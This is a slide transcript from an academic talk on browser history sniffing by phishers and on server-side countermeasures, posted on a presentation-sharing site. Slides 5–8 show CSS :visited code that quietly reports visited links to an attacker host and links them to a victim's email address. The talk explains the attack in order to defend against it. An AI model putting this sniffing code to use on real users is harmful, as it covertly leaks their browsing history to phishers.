1 / 15

Invasive Browser Sniffing and Countermeasures

Learn about the tactics used by phishers to gather personal information through invasive browser sniffing and discover server-side defenses to protect against these attacks.

andresb
Download Presentation

Invasive Browser Sniffing and Countermeasures

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript

  1. Invasive Browser Sniffing and Countermeasures Markus Jakobsson Sid Stamm

  2. His wife Hurry up! His bank His conscience

  3. He performed such a transaction ACH transfer … nice for phisher!

  4. First things first: How does the phisher know his wife’s name? Jagatic, Johnson, Jakobsson, Menczer, “Social Phishing”, To appear in CACM, available at http://www.stop-phishing.com

  5. And then: How does the phisher know where he has been? What you see: The Code: <style> a { color: blue; } #id1:visited { color: red; } #id2:visited { color: red; } #id3:visited { color: red; } </style> <a id=id1 href=“x.com”>Link 1</a> <a id=id2 href=“y.com”>Link 2</a> <a id=id3 href=“z.com”>Link 3</a> Link 1 Link 2 Link 3

  6. And then: How does the phisher know where he has been? Not visible: The Code: <style> a { color: blue; } #id1:visited { background: url(‘e.com/?id=1’); } #id2:visited { background: url(‘e.com/?id=2’); } … </style> <a id=id1 href=“x.com”></a> <a id=id2 href=“y.com”></a> <a id=id3 href=“z.com”></a> Link 1 Link 2 Link 3

  7. Architecture of this attack ?

  8. GET /?IAM=alice@x.com (lots of links) GET /hit?id=1&IAM=alice@x.com GET /hit?id=42&IAM=alice@x.com Phisher can nowassociate Alice withlink 1 and 42 Connecting to email address

  9. Try it? Try it on a friend? browser-recon.info

  10. Where can this be stopped? User paranoia (clear all) Our approach Jackson, Bortz, Boneh, Mitchell

  11. Server-side defense against browser sniffing • Principle I: Avoid correct guesses! • www.chase.com/page.html?gr4450_ooP)+ • Principle II: Cause false positives! • add wamu.com, citi.com, etc etc.

  12. Server-side defense against browser sniffing • Principle I: Avoid correct guesses! But what about the portal? • Principle II: Cause false positives! But what if they are all stigmatizing?

  13. T ST SB Translating Proxy GET /?13fc021b GET / C Domain of S

  14. Experimental data

  15. What I have not mentioned • How do we deal with robot policies? • What about search engines, proxies? • How do we select false positives? • What about links to off-site data? • How do we handle bookmarks? • What does the prototype do? Please see the paper!

More Related